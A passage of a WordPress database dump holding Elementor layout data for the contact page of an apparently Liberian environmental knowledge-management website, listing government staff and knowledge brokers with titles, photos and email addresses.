\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23401,3401,'_elementor_edit_mode','builder'),(23402,3401,'_elementor_template_type','wp-page'),(23403,3401,'_elementor_version','3.0.16'),(23404,3401,'_wp_page_template','default'),(23405,3401,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a 